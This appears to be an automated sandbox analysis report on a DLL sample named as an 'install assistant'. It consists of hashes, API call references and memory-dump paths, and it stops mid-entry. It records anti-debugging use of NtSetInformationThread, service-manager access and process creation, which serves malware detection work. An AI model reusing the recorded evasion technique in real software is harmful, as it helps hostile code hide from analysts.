                            • Instruction ID: a7cfdf900fd4645ee573208383983f588f2019db2537e88b21effad2eb88635e
                            • Opcode Fuzzy Hash: f30db2f3ef4569c30f32fcb586ecb9f2b11b6dc3121716111b7fb49b7e7b012a
                            • Instruction Fuzzy Hash: 67314D78608300EFD711DF28C889B0ABBF4AF99744F508D6EE498F7760D37298598B52

                            Control-flow Graph
                            • Graph rooted at 6bf33886 (basic blocks marked executed / not executed; edge list omitted). API calls on its paths: GetCurrentThread, NtSetInformationThread; internal calls to 6c0819e0, 6c0819f0 and 6bf33750.
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 76db5ff662f416661eb85cfa15aa9eccf1900e9e6f59a691e7b5381df3668479
                            • Instruction ID: 7807f0ee11e6fe06a92e8b02ffe1b94fa40b8bad8824c488d5efa99cafd4648b
                            • Opcode Fuzzy Hash: 76db5ff662f416661eb85cfa15aa9eccf1900e9e6f59a691e7b5381df3668479
                            • Instruction Fuzzy Hash: 4032D233644B118FC334CF28C890695B7E3EFD13147698A6CC0EA5B6A5D779B44ACB90

                            Control-flow Graph
                            • Graph rooted at 6bf33a6a (basic blocks marked executed / not executed; edge list omitted). API calls on its paths: GetCurrentThread, NtSetInformationThread; internal calls to 6c0819e0, 6c0819f0 and 6bf33750.
                            APIs
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: b53a6fd6b306d538fdcc07c075b9cd68c1dc0aed36e8a6d952d10096a1af8d63
                            • Instruction ID: 64883e090aa218d9e82f64be5466cd1ee5b55bbfa9f53d89bec019ccdad81be7
                            • Opcode Fuzzy Hash: b53a6fd6b306d538fdcc07c075b9cd68c1dc0aed36e8a6d952d10096a1af8d63
                            • Instruction Fuzzy Hash: 2B51BE33604B218FC330CF28C8807D5B7E3AF95310F698A5DC0E65B6A5DB79B44A8B91
                            APIs
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 786ad380be988c6654ce6757878c6b86f8a84daa50015ca9c927b4dad2b65116
                            • Instruction ID: de42b8bc63bb652e6f4a45222fa295f1df26d056fc22c7522b33ed0304e67995
                            • Opcode Fuzzy Hash: 786ad380be988c6654ce6757878c6b86f8a84daa50015ca9c927b4dad2b65116
                            • Instruction Fuzzy Hash: 7751C033504B218FC730CF28C480795B7E3BF95310F698A5DC0E65B2A5DB79B44A8B91
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF33E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF33EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 8d5324aaaa7fe95ec1a210bed97fbe71b58cc587d3b6920cb30ffd87f8b31013
                            • Instruction ID: aaf4c3002e34ba7121724266c47b3e295ba347f6d285c14d24a44013f9c621ef
                            • Opcode Fuzzy Hash: 8d5324aaaa7fe95ec1a210bed97fbe71b58cc587d3b6920cb30ffd87f8b31013
                            • Instruction Fuzzy Hash: A631E133645B11CBD730CF38C8847C6B7A3AF96314F598A5DC0E65B2A1DB7970098B91
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF33E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF33EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 21860b453ecb48d7e35b7873562641f1d7a6174bab3ce785a90043c8e2d852ea
                            • Instruction ID: c9a659ed2729809017ce685777c3c1bedb5fb6c8aad03f818374e25e4354bae0
                            • Opcode Fuzzy Hash: 21860b453ecb48d7e35b7873562641f1d7a6174bab3ce785a90043c8e2d852ea
                            • Instruction Fuzzy Hash: DE312133104B11CBC734CF28C480796BBB3AF82304F658A5CC0EA5B2A1DB7A7049CB91
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0B56A0
                            Similarity
                            • API ID: ManagerOpen
                            • String ID:
                            • API String ID: 1889721586-0
                            • Opcode ID: 1ecc2657c387382fcaf8a4e01eb418e6ebf6cad487be0925c1cb2bcda99e7509
                            • Instruction ID: dc65375a5580c1c30429f015b657b876954d546919323d20a4a091b73d669718
                            • Opcode Fuzzy Hash: 1ecc2657c387382fcaf8a4e01eb418e6ebf6cad487be0925c1cb2bcda99e7509
                            • Instruction Fuzzy Hash: ED312B78A48342EFC701CF29D544B0EBBF4EB89764F50889AF889D7361C371C9459B66
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF33E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF33EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 65985e1a883fd4209a227fa68b4e7f24a9835aa07e48ea78dc63e4eb3e5d7b8a
                            • Instruction ID: e53658f37a4f74f76cefc8cb8c2b1360a79be3a0bb54c96befc73276535cc3c7
                            • Opcode Fuzzy Hash: 65985e1a883fd4209a227fa68b4e7f24a9835aa07e48ea78dc63e4eb3e5d7b8a
                            • Instruction Fuzzy Hash: B921E573218B118BD734CF34C890796B7B6AF42304F548A5DC0E64B2A1DB7D74448B91
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6C0AB44C
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: 1a108bd7e703966fc8b53d6ba74ddd8de862d479e0ac45e4816e0d1cd453bc2f
                            • Instruction ID: b8736eded5ca51b0603c447f0b76f312a67930d81222c453e9ac686bf8ef6f55
                            • Opcode Fuzzy Hash: 1a108bd7e703966fc8b53d6ba74ddd8de862d479e0ac45e4816e0d1cd453bc2f
                            • Instruction Fuzzy Hash: 63115A74508354AFD700CFA8D58460EBBE4BF86314F548E59F4A8CBB92D330CC868B06
                            APIs
                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C08B117
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                            • API String ID: 2738559852-1563143607
                            • Opcode ID: a4bc5a7173fbfa4c77bd98498d11b804311b87ea2f9e0908fb1d0fa749ab01e9
                            • Instruction ID: b59c9f3c078c8fd92b26b5c079e6c2cc97f67db76ebaf1d95675214a0f4abfd6
                            • Opcode Fuzzy Hash: a4bc5a7173fbfa4c77bd98498d11b804311b87ea2f9e0908fb1d0fa749ab01e9
                            • Instruction Fuzzy Hash: B262477060A7818FCB24CF28C890B5EBBE1ABD9314F648D1EE8A9CB751D735D8458B46

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 8f9cc9f6d346b96a60dead2f593ebba4d2703f9fb3153c1d32fb2d7c11a41a59
                            • Instruction ID: 852a95cb44b831e5e3c5971400ae3e3caf16397ce21aa5a11b724fba5d57b45b
                            • Opcode Fuzzy Hash: 8f9cc9f6d346b96a60dead2f593ebba4d2703f9fb3153c1d32fb2d7c11a41a59
                            • Instruction Fuzzy Hash: 89C1D374B48349AFDF01CF98C880BADBBF5EF4A318F504159E524ABB91C771A945CB22

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            APIs
                              • Part of subcall function 6C0D49C7: CreateFileW.KERNEL32(00000000,00000000,?,6C0D4685,?,?,00000000,?,6C0D4685,00000000,0000000C), ref: 6C0D49E4
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D46F0
                            • __dosmaperr.LIBCMT ref: 6C0D46F7
                            • GetFileType.KERNEL32(00000000), ref: 6C0D4703
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0D470D
                            • __dosmaperr.LIBCMT ref: 6C0D4716
                            • CloseHandle.KERNEL32(00000000), ref: 6C0D4736
                            • CloseHandle.KERNEL32(6C0CB640), ref: 6C0D4883
                            • GetLastError.KERNEL32 ref: 6C0D48B5
                            • __dosmaperr.LIBCMT ref: 6C0D48BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: 9159943bf4bfa1591870aa40319b1d2bf42564415fa1f5a5e7da35b20efd34e6
                            • Instruction ID: 3816cb5adf42f6c0e3bf229d728e6a2dbc47bae5acf1f5f36403e38fc8bf95a8
                            • Opcode Fuzzy Hash: 9159943bf4bfa1591870aa40319b1d2bf42564415fa1f5a5e7da35b20efd34e6
                            • Instruction Fuzzy Hash: DAA14932A14249AFCF09CFA8C8517AD7BF5AF07328F190159E811EF790CB35A916CB55

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                            • API String ID: 0-4100612575
                            • Opcode ID: 4473441953b5c17a158b2db18c899ccf595ed08f2904e5f7fce8c80e63574ce0
                            • Instruction ID: 9fe492040b5531bbe3e370b7eefeb8807d15cbd4179fa1c92e7e10989e68a97d
                            • Opcode Fuzzy Hash: 4473441953b5c17a158b2db18c899ccf595ed08f2904e5f7fce8c80e63574ce0
                            • Instruction Fuzzy Hash: 6A719EB0209345AFDB10DF18C480B9ABBF5FF8A708F508A2EF489D7651D771D9489B82
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                            • API String ID: 0-174837320
                            • Opcode ID: 308364bcea87bc15e86ea34cdbe21d4be8c4b775a30247d76fe8ba1d907717b8
                            • Instruction ID: dbd5749f7da0e7bd2b63b7a2c6341b70e46c12d27f963663047d580cebae3050
                            • Opcode Fuzzy Hash: 308364bcea87bc15e86ea34cdbe21d4be8c4b775a30247d76fe8ba1d907717b8
                            • Instruction Fuzzy Hash: 8042357460A3429FCB14DE28C49071EBBF1AF89318F248E6EE5A587B61D734E845CB53
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;T55
                            • API String ID: 0-2572755013
                            • Opcode ID: e9025daec63e6ef48e3a35acd160ffa1ac139b834bbc3a2ad3ff3f94c48367b0
                            • Instruction ID: 088e16f6f18e5c916c68cea1d1df6641c86c8b8ad6448f6861c65dce8181aa00
                            • Opcode Fuzzy Hash: e9025daec63e6ef48e3a35acd160ffa1ac139b834bbc3a2ad3ff3f94c48367b0
                            • Instruction Fuzzy Hash: 9503C733644B018FC728CF28C8D0695B7E3EFD5324759CA6DC0AA4B6A6D778B54ACB50

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID: D
                            • API String ID: 963392458-2746444292
                            • Opcode ID: c55cd2a0b56a57a7d21bea87bf175d3531012ee813ddf3fc24b0b3ca9d07c1b5
                            • Instruction ID: da992ff01eb48210798cbe821a45cc128c950bbc04e7efc5bf33fa1e10243d10
                            • Opcode Fuzzy Hash: c55cd2a0b56a57a7d21bea87bf175d3531012ee813ddf3fc24b0b3ca9d07c1b5
                            • Instruction Fuzzy Hash: C131E2B08093818FE740DF28D19876EBBF0AB9A318F409A1DF8D997250E7759588CF47

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            APIs
                              • Part of subcall function 6C0CC421: GetConsoleCP.KERNEL32(?,6C0CB640,?), ref: 6C0CC469
                            • WriteFile.KERNEL32(?,?,6C0D4C5C,00000000,00000000,?,00000000,00000000,6C0D6026,00000000,00000000,?,00000000,6C0CB640,6C0D4C5C,00000000), ref: 6C0CC31F
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0D4C5C,6C0CB640,00000000,?,?,?,?,00000000,?), ref: 6C0CC329
                            • __dosmaperr.LIBCMT ref: 6C0CC36E
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                            • String ID: 8Q
                            • API String ID: 251514795-4022487301
                            • Opcode ID: 3c499b7c5fac59fc2d60e57a6ff5eeec2959bc66fec5f09c0227b2405ab00260
                            • Instruction ID: 246ad75c95586969e65784092c865a594ed526555db6f48da61451a4974a21da
                            • Opcode Fuzzy Hash: 3c499b7c5fac59fc2d60e57a6ff5eeec2959bc66fec5f09c0227b2405ab00260
                            • Instruction Fuzzy Hash: 7851D171B0421AAFDB01EFE8C840BEEBBF8FF4A358F140155E510BBA50D731A9458762

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0B62A1
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            • Associated: 00000007.00000002.2331007432.000000006BF30000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332231069.000000006C0D8000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332299983.000000006C0E8000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332850228.000000006C1B3000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2332883719.000000006C1B9000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000007.00000002.2333534959.000000006C2A3000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_6bf30000_#U5b89#U88c5#U52a9#U624b2.jbxd
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 323602529-1866435925
                            • Opcode ID: e5a501e2d125a383814efc229a8d33aaa36692e0b0f08a87eb0d057d95c231a7
                            • Instruction ID: 6bae69cdc6d75256cf0b73913da4c42ba9a748ccac1fb5d987f96d8673d7cf4d
                            • Opcode Fuzzy Hash: e5a501e2d125a383814efc229a8d33aaa36692e0b0f08a87eb0d057d95c231a7
                            • Instruction Fuzzy Hash: D75133B5900B008FD725CF29C895B96BBF1BB48318F448A2DD8865BB91D776B909CF90

                            Control-flow Graph (rendered graph omitted; node and edge data not reproduced)
                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6C0D47CF), ref: 6C0CBEEB
                            • GetLastError.KERNEL32(?,00000000,?,6C0D47CF), ref: 6C0CBEF5
                            • __dosmaperr.LIBCMT ref: 6C0CBF20
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: CloseErrorHandleLast__dosmaperr
                            • String ID: 8y
                            • API String ID: 2583163307-1876948340
                            • Opcode ID: 7fbf3bff8dce6334b762b6bc37b50d129bcb31768639aac63d10807168ea5afa
                            • Instruction ID: 595fc840f391d8269d41e225d418c97ea8fc8e5349d7b79f4f9e886fd4e7af6c
                            • Opcode Fuzzy Hash: 7fbf3bff8dce6334b762b6bc37b50d129bcb31768639aac63d10807168ea5afa
                            • Instruction Fuzzy Hash: 3101483370832026C20156B99454BAE2BED4F83F3CF3A4248EA1487BD1DF71E8849552

                            Control-flow Graph (function at 6c0c110c; the rendered graph with its Executed / Not Executed block colouring is not recoverable as text)
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction ID: da45be805bba3bd66bf0ede0be2ec413e0f7b3da4389a616bcca2ac6b1724a43
                            • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                            • Instruction Fuzzy Hash: 11F0A436B026146AD6222A79DC00BCE32E89F8277DF114715ED2493FD0DB79E40AD6E7
                            APIs
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0B6024
                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0B6064
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: Ios_base_dtorstd::ios_base::_
                            • String ID:
                            • API String ID: 323602529-0
                            • Opcode ID: 9697bf3927e59a3da56662d2576502564797e9e80a9583bd4884fc49c2131858
                            • Instruction ID: 4f6a5117cc0d98c554d87fb86e8dd31f0ab1ea7d50861407b83ad4f2cd2792e7
                            • Opcode Fuzzy Hash: 9697bf3927e59a3da56662d2576502564797e9e80a9583bd4884fc49c2131858
                            • Instruction Fuzzy Hash: 38514775101B01DBE725CF24C885BD6BBF4FF04718F448A5DE4AA5B6A1DB31B548CB81
                            APIs
                            • GetLastError.KERNEL32(6C0E6DF0,0000000C), ref: 6C0BF4C2
                            • ExitThread.KERNEL32 ref: 6C0BF4C9
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: ErrorExitLastThread
                            • String ID:
                            • API String ID: 1611280651-0
                            • Opcode ID: 692b939171038048a096bfe749aaf1c4c9531d925cc2dbaff111d116b2798132
                            • Instruction ID: af80a7190e5acce0cd0ef2f0cbb22e6e44665054195497df108d7f4125fbc52d
                            • Opcode Fuzzy Hash: 692b939171038048a096bfe749aaf1c4c9531d925cc2dbaff111d116b2798132
                            • Instruction Fuzzy Hash: 36F0AF75A40205AFDB149BB0C408BAE7BF8FF05718F244549F106A7B51CF356945CB61
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: 381bc10d80fb33c419758748fbe122c7d6d8a43501542678c3084df1b73b517d
                            • Instruction ID: 194c1a3315d7d3316f931ac908498eba642cc7f6cc9906ffa028984da16c118b
                            • Opcode Fuzzy Hash: 381bc10d80fb33c419758748fbe122c7d6d8a43501542678c3084df1b73b517d
                            • Instruction Fuzzy Hash: FA114871A0420AAFCF05DF59E940ADF7BF8EF48308F154069F809AB341D671E921CBA9
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction ID: 5ac337abc7e5bc548734fbb2dcc3fad5f2b4866c0a9bd026fb4388956c1311d8
                            • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                            • Instruction Fuzzy Hash: A2017C72C10259BFCF01AFE88C00AEE7FF5BF08214F104165EA24A22A1E7319A24DB81
                            APIs
                            • CreateFileW.KERNEL32(00000000,00000000,?,6C0D4685,?,?,00000000,?,6C0D4685,00000000,0000000C), ref: 6C0D49E4
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 6ac0aff718d129ef2607281cb0ad7c377c4712e5b4b2eb2ae92e8979ccb9a01e
                            • Instruction ID: 7daa1fe7d5d25797752cb3b83449080b2216b0994d2129429e0788578b2f1384
                            • Opcode Fuzzy Hash: 6ac0aff718d129ef2607281cb0ad7c377c4712e5b4b2eb2ae92e8979ccb9a01e
                            • Instruction Fuzzy Hash: EFD06C3214010DBBDF029E84DC06EDA3BAAFB4C714F024000BA1856020C732E861AB90
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction ID: 143e81c569b273025fc9810a336c9c45e8ba07553bce963319e580c7da643a31
                            • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                            • Instruction Fuzzy Hash:
                            Memory Dump Source
                            • Source File: 00000007.00000002.2331024632.000000006BF31000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF30000, based on PE: true
                            Similarity
                            • API ID: _strlen
                            • String ID: g)''
                            • API String ID: 4218353326-3487984327
                            • Opcode ID: 79e1c2535bce03d90f969d8ae9e6aec5ea39e46beab893da8468d4339aaa79e8
                            • Instruction ID: 9610d62b192f5c5e3e4a8e95efb3f65787308d9ed2c6f25f90adab724ec18282
                            • Opcode Fuzzy Hash: 79e1c2535bce03d90f969d8ae9e6aec5ea39e46beab893da8468d4339aaa79e8
                            • Instruction Fuzzy Hash: 74632431644B018FC728CF28C8D0B99B7F3EF853187698A6DC0E65BA55EB75B54ACB40
                            APIs
                            • GetCurrentProcess.KERNEL32 ref: 6C0B62DA
